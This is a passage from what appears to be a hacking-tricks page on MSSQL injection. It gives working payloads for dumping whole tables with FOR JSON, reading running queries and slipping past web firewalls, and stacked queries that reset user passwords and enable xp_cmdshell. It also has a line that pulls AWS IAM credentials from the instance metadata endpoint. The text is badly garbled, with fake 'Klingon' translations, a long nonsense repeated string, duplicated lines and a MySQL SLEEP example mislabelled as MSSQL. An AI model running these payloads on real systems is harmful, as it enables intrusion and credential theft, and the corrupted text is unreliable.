SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
SELECT dbo.http(@url);

QIb Exploitation: retrieving entire table contents in a single query

Trick from here.

A concise method for extracting the full content of a table in a single query involves utilizing the FOR JSON clause. This approach is more succinct than using the FOR XML clause, which requires a specific mode like "raw". The FOR JSON clause is preferred for its brevity.

Here's how to retrieve the schema, tables, and columns from the current database:

https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:

```sql
### SQL Injection (MSSQL)

#### Description

SQL Injection is a web application vulnerability that allows an attacker to manipulate the SQL queries executed by the application's database. By injecting malicious SQL code, an attacker can bypass authentication, retrieve sensitive information, modify or delete data, and even gain remote code execution.

#### MSSQL Injection

MSSQL Injection refers specifically to SQL Injection attacks targeting Microsoft SQL Server databases. MSSQL Injection attacks can be devastating if successful, as they can provide unauthorized access to sensitive data and compromise the entire system.

#### Exploiting MSSQL Injection

To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the target web application. These input fields are typically used to construct SQL queries that interact with the database.

One common technique used in MSSQL Injection is the UNION-based attack. This technique involves injecting a UNION statement into the SQL query to combine the results of two separate queries. By carefully crafting the injected code, an attacker can retrieve data from different database tables.

Another technique is the Error-based attack, which exploits error messages generated by the database server. By injecting code that triggers an error, an attacker can extract valuable information from the error message, such as table and column names.

#### Example

Let's consider the following vulnerable URL:

https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--

In this example, the attacker is injecting SQL code after the `id` parameter. The injected code attempts to retrieve the names of all database tables and their corresponding column names using the `information_schema.columns` table. The retrieved data is then concatenated using the `concat_ws` function and returned as a JSON object.

#### Prevention

To prevent MSSQL Injection attacks, it is crucial to implement secure coding practices and input validation techniques. Here are some preventive measures:

- Use parameterized queries or prepared statements to ensure that user input is properly sanitized.
- Implement strict input validation to reject any input that does not conform to the expected format.
- Regularly update and patch the database server to fix any known vulnerabilities.
- Employ a web application firewall (WAF) to detect and block SQL Injection attempts.
- Limit the privileges of database accounts used by the application to minimize the potential impact of a successful attack.

Remember, preventing SQL Injection requires a combination of secure coding practices, regular security assessments, and ongoing monitoring of your web application.

Retrieving the Current Query

Trick from here.

For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:

### SQL Injection in MSSQL

#### Description

SQL Injection is a common vulnerability that allows an attacker to manipulate the SQL queries executed by an application. In MSSQL, this vulnerability can be exploited to extract sensitive information from the database.

#### Exploiting MSSQL Injection

To exploit MSSQL Injection, you can use various techniques. One of them is the UNION-based attack. This attack involves injecting a malicious SQL statement into the original query using the UNION operator.

Here is an example of a UNION-based MSSQL Injection:

```plaintext
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null

In this example, the injection is performed by appending the following payload to the original query:

-1 union select null,(select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)),null,null

The injected SQL statement retrieves the text of the currently executing SQL query using the sys.dm_exec_requests and sys.dm_exec_sql_text system views.

Impact

By successfully exploiting MSSQL Injection, an attacker can gain unauthorized access to sensitive information stored in the database. This can include usernames, passwords, and other confidential data.

Prevention

To prevent MSSQL Injection, it is important to implement secure coding practices such as:

• Using parameterized queries or prepared statements.
• Validating and sanitizing user input.
• Implementing least privilege principles for database access.
• Keeping the database software up to date with the latest security patches.

By following these best practices, you can significantly reduce the risk of SQL Injection vulnerabilities in your MSSQL applications.

To check if you have the VIEW SERVER STATE permission, the following query can be used:

```sql

SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';

Translation:

SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';

Translation (Klingon):

SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';

Little tricks for WAF bypasses

Tricks also from here

Non-standard whitespace characters: %C2%85 или %C2%A0:

### SQL Injection - MSSQL Injection

#### Description

MSSQL Injection is a type of SQL Injection attack that targets Microsoft SQL Server databases. It allows an attacker to manipulate the SQL queries executed by the application, potentially gaining unauthorized access to sensitive data or performing unauthorized actions.

#### Exploiting MSSQL Injection

To exploit MSSQL Injection, you need to identify vulnerable input fields that are not properly sanitized or validated by the application. These fields are typically used in SQL queries without proper parameterization or input validation, allowing an attacker to inject malicious SQL code.

One common technique used in MSSQL Injection is the UNION-based attack. This technique leverages the UNION operator to combine the results of two or more SELECT statements into a single result set. By injecting a UNION statement into the original query, an attacker can retrieve data from other tables or even execute arbitrary SQL commands.

#### Example

Consider the following vulnerable URL:

https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--

In this example, the `id` parameter is vulnerable to MSSQL Injection. The attacker appends a UNION-based payload to the original query, which retrieves the version of the MSSQL Server.

#### Mitigation

To prevent MSSQL Injection attacks, it is crucial to implement proper input validation and parameterization techniques. Here are some recommended mitigation measures:

- Use parameterized queries or prepared statements to ensure that user input is properly sanitized and treated as data, rather than executable code.
- Implement strict input validation to reject any input that does not conform to the expected format or range.
- Apply the principle of least privilege by ensuring that database accounts used by the application have limited permissions and access only the necessary data.
- Regularly update and patch the MSSQL Server to address any known security vulnerabilities.

#### Additional Resources

- [OWASP SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)
- [SQL Injection Attacks and Defense](https://www.acunetix.com/websitesecurity/sql-injection/)
- [SQL Injection: A Beginner's Guide](https://www.imperva.com/learn/application-security/sql-injection-sqli/)

Scientific (0e) and hex (0x) notation for obfuscating UNION:

### SQL Injection (MSSQL)

#### Description

SQL Injection is a common web application vulnerability that allows an attacker to manipulate the SQL queries executed by the application's database. This can lead to unauthorized access, data leakage, and other security breaches.

#### MSSQL Injection

MSSQL Injection refers specifically to SQL Injection attacks targeting Microsoft SQL Server databases. MSSQL Injection can be used to extract sensitive information, modify data, or even execute arbitrary commands on the database server.

#### Exploiting MSSQL Injection

To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the web application. These are typically found in URL parameters, form inputs, or cookies.

The following examples demonstrate how an attacker can exploit MSSQL Injection in a web application:

1. **Example 1:**
   - URL: `https://vuln.app/getItem?id=0eunion+select+null,@@version,null--`
   - Translation: `https://vuln.app/getItem?id=0eunion+select+null,@@version,null--`

2. **Example 2:**
   - URL: `https://vuln.app/getItem?id=0xunion+select+null,@@version,null--`
   - Translation: `https://vuln.app/getItem?id=0xunion+select+null,@@version,null--`

In both examples, the attacker appends malicious SQL code (`union select null,@@version,null--`) to the `id` parameter. This code performs a UNION-based SQL Injection attack, retrieving the version of the MSSQL Server (`@@version`) and displaying it as a result.

#### Prevention

To prevent MSSQL Injection attacks, it is crucial to implement secure coding practices and input validation techniques. Some recommended measures include:

- Using parameterized queries or prepared statements to prevent SQL injection.
- Implementing input validation and sanitization to filter out malicious input.
- Applying the principle of least privilege to database accounts, limiting their permissions.
- Keeping database software and web application frameworks up to date with the latest security patches.

By following these best practices, developers can significantly reduce the risk of MSSQL Injection vulnerabilities in their web applications.

A period instead of a whitespace between FROM and a column name:

### SQL Injection in MSSQL

#### Description

SQL Injection is a common vulnerability that allows an attacker to manipulate the SQL queries executed by an application. In the case of MSSQL, it can lead to unauthorized access, data leakage, and other security risks.

#### Exploiting MSSQL Injection

To exploit MSSQL Injection, you need to identify the vulnerable parameter in the application's URL or form input. In this case, the vulnerable parameter is `id`, which is being used in a SQL query without proper sanitization.

The URL `https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--` is an example of an MSSQL Injection attack. The payload `1 union select null,@@version,null from users--` is injected into the `id` parameter.

#### Translation (Klingon)

### MSSQL vIqroS

#### Qap

SQL vIqroS Hoch vItlhutlhlaHchugh vaj vItlhutlhlaHchugh vItlhutlhlaHchugh vaj vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhlaHchugh vItlhutlhla

\N separator between SELECT and a throwaway column:

# MSSQL Injection

## Introduction

MSSQL Injection is a technique used to exploit vulnerabilities in web applications that use Microsoft SQL Server as their database management system. By injecting malicious SQL queries into user input fields, an attacker can manipulate the application's database and potentially gain unauthorized access to sensitive information.

## Exploiting MSSQL Injection

To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the target web application. These input fields are typically used to construct SQL queries that interact with the database. By injecting carefully crafted SQL statements, an attacker can manipulate the behavior of these queries and extract or modify data.

### Union-Based SQL Injection

One common technique used in MSSQL Injection is Union-Based SQL Injection. This technique involves injecting a UNION SELECT statement into an input field to retrieve data from other database tables. The UNION SELECT statement allows an attacker to combine the result sets of multiple SELECT queries into a single result set.

To perform a Union-Based SQL Injection in MSSQL, the following steps can be followed:

1. Identify a vulnerable input field that is used in a SQL query.
2. Craft a UNION SELECT statement that retrieves data from other tables.
3. Inject the UNION SELECT statement into the input field.
4. Observe the application's response to determine if the injection was successful.
5. Extract the retrieved data from the application's response.

## Example

Let's consider the following vulnerable URL:

https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

In this example, the `id` parameter is vulnerable to Union-Based SQL Injection. The injected payload `0xunion+select\Nnull,@@version,null+from+users--` attempts to retrieve the version of the MSSQL Server from the `users` table.

To translate the example to Klingon:

https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

In this example, the `id` parameter is vulnerable to Union-Based SQL Injection. The injected payload `0xunion+select\Nnull,@@version,null+from+users--` attempts to retrieve the version of the MSSQL Server from the `users` table.

Conclusion

MSSQL Injection is a powerful technique that can be used to exploit vulnerabilities in web applications. By understanding the underlying SQL queries and injecting malicious payloads, an attacker can gain unauthorized access to sensitive data. It is important for developers to implement proper input validation and parameterized queries to mitigate the risk of MSSQL Injection attacks.

### WAF Bypass with unorthodox stacked queries

According to [**this blog post**](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/) it's possible to stack queries in MSSQL without using ";":

```sql

SELECT 'a' SELECT 'b'

SELECT 'a' SELECT 'b'

SELECT 'a' SELECT 'b'

So for example, multiple queries such as:

use [tempdb] create table [test] ([id] int) insert [test] values(1) select [id] from [test] drop table[test]

use [tempdb] create table [test] ([id] int) insert [test] values(1) select [id] from [test] drop table[test]

use [tempdb] create table [test] ([id] int) insert [test] values(1) select [id] from [test] drop table[test]

use [tempdb] create table [test] ([id] int) insert [test] values(1) select [id] from [test] drop table[test]

Can be reduced to:

---


### SQL Injection - MSSQL Injection

---

#### Table of Contents

- [Introduction](#introduction)
- [Basic MSSQL Injection](#basic-mssql-injection)
- [Error-Based MSSQL Injection](#error-based-mssql-injection)
- [Union-Based MSSQL Injection](#union-based-mssql-injection)
- [Time-Based MSSQL Injection](#time-based-mssql-injection)
- [Boolean-Based MSSQL Injection](#boolean-based-mssql-injection)
- [Conclusion](#conclusion)

---

#### Introduction

MSSQL Injection is a type of SQL Injection attack that targets Microsoft SQL Server databases. It allows an attacker to manipulate the SQL queries executed by the application, potentially gaining unauthorized access to the database or performing other malicious actions.

In this section, we will explore various techniques for exploiting MSSQL Injection vulnerabilities and provide examples to illustrate each technique.

---

#### Basic MSSQL Injection

Basic MSSQL Injection involves injecting malicious SQL code into user input fields to manipulate the SQL query executed by the application. The injected code can modify the query's logic, extract sensitive information, or perform other unauthorized actions.

To demonstrate a basic MSSQL Injection, consider the following vulnerable code snippet:

```sql
SELECT * FROM users WHERE username = '<user_input>';

An attacker can exploit this vulnerability by injecting a malicious input such as ' OR '1'='1' --. The resulting query would be:

SELECT * FROM users WHERE username = '' OR '1'='1' --';

This modified query will always return all rows from the users table, effectively bypassing any authentication mechanism.

---

Error-Based MSSQL Injection

Error-Based MSSQL Injection involves exploiting SQL errors to extract information from the database. By injecting malicious code that triggers an error, an attacker can obtain valuable information about the database structure or the data stored within it.

Consider the following vulnerable code snippet:

SELECT * FROM users WHERE id = <user_input>;

An attacker can exploit this vulnerability by injecting a malicious input such as 1 OR 1=1. The resulting query would be:

SELECT * FROM users WHERE id = 1 OR 1=1;

If the application does not properly handle errors, an error message may be displayed, revealing sensitive information about the database. For example, an error message like Column 'password' does not exist indicates that the users table has a column named password.

---

Union-Based MSSQL Injection

Union-Based MSSQL Injection involves leveraging the UNION operator to combine the results of two or more SQL queries into a single result set. By injecting malicious code that includes a UNION statement, an attacker can extract data from other tables in the database.

Consider the following vulnerable code snippet:

SELECT username, password FROM users WHERE id = <user_input>;

An attacker can exploit this vulnerability by injecting a malicious input such as 1 UNION SELECT username, password FROM admin. The resulting query would be:

SELECT username, password FROM users WHERE id = 1 UNION SELECT username, password FROM admin;

This modified query will return the usernames and passwords from both the users and admin tables, allowing the attacker to extract sensitive information.

---

Time-Based MSSQL Injection

Time-Based MSSQL Injection involves exploiting time delays in SQL queries to infer information about the database. By injecting malicious code that introduces a time delay, an attacker can determine whether a specific condition is true or false.

Consider the following vulnerable code snippet:

SELECT * FROM users WHERE id = <user_input>;

An attacker can exploit this vulnerability by injecting a malicious input such as 1 AND SLEEP(5). The resulting query would be:

SELECT * FROM users WHERE id = 1 AND SLEEP(5);

If the application experiences a delay of 5 seconds before responding, it indicates that the injected condition is true. This technique can be used to extract information or perform other actions based on the application's response time.

---

Boolean-Based MSSQL Injection

Boolean-Based MSSQL Injection involves exploiting boolean conditions in SQL queries to infer information about the database. By injecting malicious code that evaluates to either true or false, an attacker can determine whether a specific condition is true or false.

Consider the following vulnerable code snippet:

SELECT * FROM users WHERE id = <user_input>;

An attacker can exploit this vulnerability by injecting a malicious input such as 1 AND 1=1. The resulting query would be:

SELECT * FROM users WHERE id = 1 AND 1=1;

If the application returns a result, it indicates that the injected condition is true. This technique can be used to extract information or perform other actions based on the application's response.

---

Conclusion

MSSQL Injection is a serious security vulnerability that can lead to unauthorized access, data leakage, and other malicious activities. It is essential for developers to implement proper input validation and parameterized queries to prevent these types of attacks.

By understanding the various techniques used in MSSQL Injection attacks, security professionals can better protect their applications and databases from exploitation.

---

Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:

Adding a useless exec() at the end and making the WAF think this isn't a valid querie

admina'union select 1,'admin','testtest123'exec('select 1')--

Qagh:

SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123' exec('select 1')--'

Using weirdly built queries

admin'exec('update[users]set[password]=''a''')--

Qagh:

SELECT id, username, password FROM users WHERE username = 'admin' exec('update[users]set[password]=''a''')--'

Or enabling xp_cmdshell

admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--

Qagh:

select * from users where username = ' admin' exec('sp_configure''show advanced option'',''1''reconfigure') exec('sp_configure''xp_cmdshell'',''1''reconfigure')--

## References

* [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)
* [https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>